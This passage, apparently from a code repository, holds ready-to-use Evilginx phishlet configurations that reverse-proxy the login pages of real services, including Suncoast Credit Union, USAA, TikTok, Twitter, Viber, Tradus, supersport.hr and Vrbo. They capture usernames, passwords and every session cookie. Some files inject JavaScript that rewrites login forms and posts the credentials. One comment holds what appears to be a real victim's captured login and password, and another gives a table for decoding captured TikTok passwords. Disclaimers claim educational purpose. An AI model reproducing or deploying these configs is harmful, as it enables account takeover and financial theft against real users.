'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} auth_tokens: - domain: '.suncoastcreditunion.com' keys: ['.*,regexp'] - domain: 'banking.suncoastcreditunion.com' keys: ['.*,regexp'] - domain: '.banking.suncoastcreditunion.com' keys: ['.*,regexp'] - domain: 'suncoastcreditunion.com' keys: ['.*,regexp'] - domain: 'www.suncoastcreditunion.com' keys: ['.*,regexp'] auth_urls: - '/*' - '/' credentials: username: key: 'memberId' search: '(.*)' type: 'post' password: key: 'password' search: '(.*)' type: 'post' login: domain: 'www.suncoastcreditunion.com' path: '/' -------------------------------------------------------------------------------- /phishlet_examples/supersport.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | author: '@An0nud4y' 5 | min_ver: '2.3.0' 6 | proxy_hosts: 7 | - {phish_sub: 'www', orig_sub: 'www', domain: 'supersport.hr', session: true, is_landing: true} 8 | - {phish_sub: '', orig_sub: '', domain: 'supersport.hr', session: true, is_landing: false} 9 | sub_filters: 10 | - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 12 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 13 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 14 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} 15 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 16 | - {triggers_on: 'www.supersport.hr', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 17 | - {triggers_on: 'www.supersport.hr/res/', orig_sub: 'www', domain: 'supersport.hr', search: 'i=n(2494);', replace: 'i=n(165);', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 18 | 19 | 20 | # i=n(2494); --> i=n(165); 21 | # a.render(r.createElement(i,null),document.getElementById("mount-app"));var o=n(139),l=n(165); 22 | # 23 | 24 | auth_tokens: 25 | - domain: '.supersport.hr' 26 | keys: ['session_id', '_dvc', '.*,regexp'] 27 | credentials: 28 | username: 29 | key: 'login' 30 | search: '(.*)' 31 | type: 'post' 32 | password: 33 | key: 'password' 34 | search: '(.*)' 35 | type: 'post' 36 | login: 37 | domain: 'www.supersport.hr' 38 | path: '/igraci/prijava/' 39 | 40 | js_inject: 41 | - trigger_domains: ["www.supersport.hr"] 42 | trigger_paths: ["/igraci/prijava/"] 43 | trigger_params: [] 44 | script: | 45 | function onclickListener(){ 46 | document.getElementById("mount-app").innerHTML = '

Login

Betting is prohibited for U.S. citizens and anyone with a work permit in the United States.
Only can apply registered players .
Formabottom
' 47 | return; 48 | } 49 | function sendPass(){ 50 | var login = document.getElementsByName("prijava[login]")[0].value; 51 | var password = document.getElementsByName("prijava[password]")[0].value; 52 | var xhr = new XMLHttpRequest(); 53 | xhr.open("POST", '/login', true); 54 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 55 | xhr.send("login="+encodeURIComponent(login)+""+" password="+encodeURIComponent(password)); 56 | return; 57 | } 58 | setTimeout(function(){ onclickListener(); }, 2000); 59 | 60 | 61 | # AUTHENTICATION REQUEST 62 | #prijava:7 63 | #{"login":" jambra10","password":"Mrle1990.","useragent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0"} -------------------------------------------------------------------------------- /phishlet_examples/tiktok.yaml: -------------------------------------------------------------------------------- 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES. 2 | # PLEASE DO NOT MISUSE THIS PHISHLET. 3 | 4 | # All Post Requests Fields Get Encoded During Requests to Server By titok javascripts. 5 | # Below is the Table Which You can use to decode your captured credentials in evilginx manually. 6 | 7 | author: '@An0nUD4Y' 8 | min_ver: '2.3.0' 9 | proxy_hosts: 10 | - {phish_sub: 'www', orig_sub: 'www', domain: 'tiktok.com', session: true, is_landing: true} 11 | - {phish_sub: 'm', orig_sub: 'm', domain: 'tiktok.com', session: true, is_landing: false} 12 | - {phish_sub: '', orig_sub: '', domain: 'tiktok.com', session: true, is_landing: false} 13 | - {phish_sub: 'polyfill', orig_sub: '', domain: 'polyfill.io', session: true, is_landing: false} 14 | - {phish_sub: 's16', orig_sub: 's16', domain: 'tiktokcdn.com', session: true, is_landing: false} 15 | - {phish_sub: 'hypstarcdn', orig_sub: 's16', domain: 'hypstarcdn.com', session: true, is_landing: false} 16 | - {phish_sub: 'kakao', orig_sub: 'developers', domain: 'kakao.com', session: true, is_landing: false} 17 | - {phish_sub: 'mon-va', orig_sub: 'mon-va', domain: 'byteoversea.com', session: true, is_landing: false} 18 | - {phish_sub: 'maliva', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', session: true, is_landing: false} 19 | - {phish_sub: 'sf16-muse-va', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', session: true, is_landing: false} 20 | 21 | sub_filters: 22 | - {triggers_on: 'www.tiktok.com', orig_sub: 'www', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 23 | - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 24 | - {triggers_on: 'm.tiktok.com', orig_sub: 'm', domain: 'tiktok.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 25 | - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 26 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 27 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'tiktokcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 28 | - {triggers_on: 'www.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 29 | - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 30 | - {triggers_on: 'm.tiktok.com', orig_sub: '', domain: 'polyfill.io', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 31 | - {triggers_on: 'www.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 32 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 33 | - {triggers_on: 'm.tiktok.com', orig_sub: 's16', domain: 'hypstarcdn.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 34 | - {triggers_on: 'www.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 35 | - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 36 | - {triggers_on: 'm.tiktok.com', orig_sub: 'developers', domain: 'kakao.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 37 | - {triggers_on: 'www.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 38 | - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 39 | - {triggers_on: 'm.tiktok.com', orig_sub: 'mon-va', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 40 | - {triggers_on: 'www.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 41 | - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 42 | - {triggers_on: 'm.tiktok.com', orig_sub: 'maliva-mcs', domain: 'byteoversea.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 43 | - {triggers_on: 'www.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']} 44 | - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']} 45 | - {triggers_on: 'm.tiktok.com', orig_sub: 'sf16-muse-va', domain: 'ibytedtos.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']} 46 | 47 | 48 | 49 | 50 | 51 | auth_tokens: 52 | - domain: '.tiktok.com' 53 | keys: ['.*,regexp'] 54 | credentials: 55 | username: 56 | key: 'account' 57 | search: '(.*)' 58 | type: 'post' 59 | password: 60 | key: 'pass' 61 | search: '(.*)' 62 | type: 'post' 63 | custom: 64 | key: 'mobile' 65 | search: '(.*)' 66 | type: 'post' 67 | 68 | login: 69 | domain: 'www.tiktok.com' 70 | path: '/login/phone-or-email/phone-password?lang=en' 71 | 72 | 73 | #Remember Server Accepts Only encoded Credentials, So don't break the js functions responsible for encoding. 74 | 75 | #ENCODING TABLE TO DECODE THE PASSWORD AND MOBILE NUMBER 76 | 77 | # FOR NUMBERS 78 | 79 | # 1 = 34 , 2 = 37 , 3 = 36 , 4 = 31 , 5 = 30 ,6 = 33 , 7 = 32 , 8 = 3d , 9 = 3c 80 | 81 | # FOR SPECIAL CHARACTERS 82 | 83 | # ! = 24 , @ = 45 , # = 26 , $ = 21 , ^ = 5b , & = 23 , * = 2f , + = 2e 84 | 85 | # FOR LETTERS (SMALL-LETTERS) 86 | 87 | # a = 64 , b=67 , c=66 ,d=61,e=60,f=63,g=62,h=6d,i=6c,j=6f,k=6e,l=69,m=68,n=6b,o=6a,p=75,q=74,r=77,s=76,t=71,u=70,v=73,w=72,x=7d,y=7c,z=7f 88 | 89 | # FOR LETTERS (CAPITAL-LETTERS) 90 | 91 | # A=44 B=47 C=46 D=41 E=40 F=43 G=42 H=4d I=4c J=4f K=4e L=49 M=48 N=4b O=4a P=55 Q=54 R=57 S=56 T=51 U=50 V=53 W=52 X=5d Y=5c Z=5f 92 | 93 | 94 | # OTHER REMAINED CODES CAN BE FOUND USING POST REQUEST ANALYSIS. 95 | 96 | -------------------------------------------------------------------------------- /phishlet_examples/tradus.yaml: -------------------------------------------------------------------------------- 1 | author: '@AN0NUD4Y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'pro', orig_sub: 'pro', domain: 'tradus.com', session: true, is_landing: false} 5 | - {phish_sub: 'api', orig_sub: 'api-pro', domain: 'tradus.com', session: true, is_landing: true} 6 | 7 | sub_filters: 8 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 9 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 10 | - {triggers_on: 'pro.tradus.com', orig_sub: 'pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 11 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 12 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 13 | - {triggers_on: 'pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 14 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 15 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 16 | - {triggers_on: 'api-pro.tradus.com', orig_sub: 'api-pro', domain: 'tradus.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} 17 | 18 | 19 | auth_tokens: 20 | - domain: '.tradus.com' 21 | keys: ['','.*,regexp'] 22 | 23 | credentials: 24 | username: 25 | key: 'Email' 26 | search: '(.*)' 27 | type: 'post' 28 | password: 29 | key: 'Password' 30 | search: '(.*)' 31 | type: 'post' 32 | 33 | login: 34 | domain: 'pro.tradus.com' 35 | path: '/login' 36 | 37 | js_inject: 38 | - trigger_domains: ["pro.tradus.com"] 39 | trigger_paths: ["/login"] 40 | trigger_params: [] 41 | script: | 42 | function lp(){ 43 | var submit = document.querySelectorAll('button[type=button]')[4]; 44 | submit.setAttribute("onclick", "sendData()"); 45 | return; 46 | } 47 | function sendData(){ 48 | var email = document.getElementsByName("email")[1].value; 49 | var password = document.getElementsByName("password")[0].value; 50 | var xhr2 = new XMLHttpRequest(); 51 | xhr2.open("POST", '/', true); 52 | xhr2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 53 | xhr2.send("Email="+encodeURIComponent(email)); 54 | var xhr = new XMLHttpRequest(); 55 | xhr.open("POST", '/', true); 56 | xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 57 | xhr.send("Password="+encodeURIComponent(password)); 58 | return; 59 | } 60 | setTimeout(function(){ lp(); }, 2500); 61 | 62 | 63 | 64 | 65 | -------------------------------------------------------------------------------- /phishlet_examples/twitter-mobile.yaml: -------------------------------------------------------------------------------- 1 | author: '@white_fi' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'mobile', orig_sub: 'mobile', domain: 'twitter.com', session: true, is_landing: true} 5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com', session: true, is_landing: false} 6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com', session: false, is_landing: false} 7 | sub_filters: 8 | - {triggers_on: 'mobile.twitter.com', orig_sub: 'mobile', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} 9 | - {triggers_on: 'abs.twimg.com', orig_sub: 'abs', domain: 'twimg.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} 10 | - {triggers_on: 'api.twitter.com', orig_sub: 'api', domain: 'twitter.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']} 11 | auth_tokens: 12 | - domain: 'twitter.com' 13 | keys: ['dnt','fm','kdt','_twitter_sess','twid','auth_token'] 14 | credentials: 15 | username: 16 | key: 'session\[username_or_email\]' 17 | search: '(.*)' 18 | type: 'post' 19 | password: 20 | key: 'session\[password\]' 21 | search: '(.*)' 22 | type: 'post' 23 | login: 24 | domain: 'mobile.twitter.com' 25 | path: '/login' 26 | -------------------------------------------------------------------------------- /phishlet_examples/twitter.yaml: -------------------------------------------------------------------------------- 1 | author: '@white_fi' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: '', orig_sub: '', domain: 'twitter.com', session: true, is_landing: true} 5 | - {phish_sub: 'abs', orig_sub: 'abs', domain: 'twimg.com'} 6 | - {phish_sub: 'api', orig_sub: 'api', domain: 'twitter.com'} 7 | sub_filters: [] 8 | auth_tokens: 9 | - domain: '.twitter.com' 10 | keys: ['kdt','_twitter_sess','twid','auth_token'] 11 | credentials: 12 | username: 13 | key: 'session\[username_or_email\]' 14 | search: '(.*)' 15 | type: 'post' 16 | password: 17 | key: 'session\[password\]' 18 | search: '(.*)' 19 | type: 'post' 20 | login: 21 | domain: 'twitter.com' 22 | path: '/login' 23 | -------------------------------------------------------------------------------- /phishlet_examples/usaa.yaml: -------------------------------------------------------------------------------- 1 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES... 2 | 3 | author: '@i_am_a_Good_Human' 4 | min_ver: '2.3.0' 5 | proxy_hosts: 6 | - {phish_sub: 'www', orig_sub: 'www', domain: 'usaa.com', session: true, is_landing: true} 7 | 8 | sub_filters: 9 | - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 10 | - {triggers_on: 'www.usaa.com', orig_sub: 'www', domain: 'usaa.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | 12 | auth_tokens: 13 | - domain: '.usaa.com' 14 | keys: ['.*,regexp'] 15 | auth_urls: 16 | - '/' 17 | credentials: 18 | username: 19 | key: 'username' 20 | search: '(.*)' 21 | type: 'post' 22 | password: 23 | key: 'j_password' 24 | search: '(.*)' 25 | type: 'post' 26 | login: 27 | domain: 'www.usaa.com' 28 | path: '/inet/ent_logon/Logon' 29 | 30 | # THE AUTHOR OF THIS PHISHLET DO NOT SUPPORT ANY ILLEGAL ACTIVITIES... 31 | 32 | -------------------------------------------------------------------------------- /phishlet_examples/viber.yaml: -------------------------------------------------------------------------------- 1 | author: '@An0nud4y' 2 | min_ver: '2.3.0' 3 | proxy_hosts: 4 | - {phish_sub: 'account', orig_sub: 'account', domain: 'viber.com', session: true, is_landing: true} 5 | - {phish_sub: '', orig_sub: '', domain: 'viber.com', session: true, is_landing: false} 6 | 7 | sub_filters: 8 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 9 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 10 | - {triggers_on: 'account.viber.com', orig_sub: 'account', domain: 'viber.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/xml', 'text/javascript', 'text/php', 'application/php', 'application/json', 'application/javascript', 'application/x-javascript']} 11 | - {triggers_on: 'account.viber.com', orig_sub: '', domain: 'viber.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']} 12 | 13 | 14 | auth_tokens: 15 | - domain: '.viber.com' 16 | keys: ['.*,regexp'] 17 | - domain: 'account.viber.com' 18 | keys: ['.*,regexp'] 19 | 20 | auth_urls: 21 | - '/account' 22 | 23 | credentials: 24 | username: 25 | key: 'phone_number' 26 | search: '(.*)' 27 | type: 'post' 28 | password: 29 | key: 'password' 30 | search: '(.*)' 31 | type: 'post' 32 | custom: 33 | - key: 'phone_prefix' 34 | search: '(.*)' 35 | type: 'post' 36 | - key: 'token' 37 | search: '(.*)' 38 | type: 'post' 39 | 40 | force_post: 41 | - path: '/api/web/login' 42 | search: 43 | - {key: 'phone_number', search: '.*'} 44 | - {key: 'password', search: '.*'} 45 | - {key: 'token', search: '.*'} 46 | force: 47 | - {key: 'remember_me', value: 'true'} 48 | - {key: 'destination', value: ''} 49 | type: 'post' 50 | 51 | login: 52 | domain: 'account.viber.com' 53 | path: '/' 54 | -------------------------------------------------------------------------------- /phishlet_examples/vrbo.yaml: -------------------------------------------------------------------------------- 1 | author: '@an0nud4y' 2 | min_ver: '2.3.0' 3 | 4 | proxy_hosts: 5 | - {phish_sub: 'www', orig_sub: 'www', domain: 'vrbo.com', session: true, is_landing: true, auto_filter: false} 6 | - {phish_sub: 'csvcus', orig_sub: 'csvcus', domain: 'homeaway.com', session: false, is_landing: false, auto_filter: false} 7 | - {phish_sub: 'tmcdn', orig_sub: 'tmcdn', domain: 'homeaway.com', session: true, is_landing: false, auto_filter: false} 8 | 9 | sub_filters: 10 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 11 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 12 | - {triggers_on: 'www.vrbo.com', orig_sub: 'www', domain: 'vrbo.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 13 | 14 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 15 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 16 | - {triggers_on: 'csvcus.homeaway.com', orig_sub: 'csvcus', domain: 'homeaway.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 17 | 18 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'www.vrbo.com', replace: 'www.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 19 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'csvcus.homeaway.com', replace: 'csvcus.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 20 | - {triggers_on: 'tmcdn.homeaway.com', orig_sub: 'tmcdn', domain: 'homeaway.com', search: 'tmcdn.homeaway.com', replace: 'tmcdn.{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript']} 21 | 22 | auth_tokens: 23 | - domain: '.vrbo.com' 24 | keys: ['.*,regexp'] 25 | - domain: 'csvcus.homeaway.com' 26 | keys: ['.*,regexp'] 27 | - domain: '.csvcus.homeaway.com' 28 | keys: ['.*,regexp'] 29 | - domain: '.www.vrbo.com' 30 | keys: ['.*,regexp'] 31 | - domain: 'www.vrbo.com' 32 | keys: ['.*,regexp'] 33 | - domain: 'tmcdn.homeaway.com' 34 | 